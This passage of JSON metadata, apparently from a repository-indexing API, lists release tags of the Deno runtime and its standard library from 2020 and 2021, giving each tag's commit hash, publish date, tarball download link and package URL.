ad.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno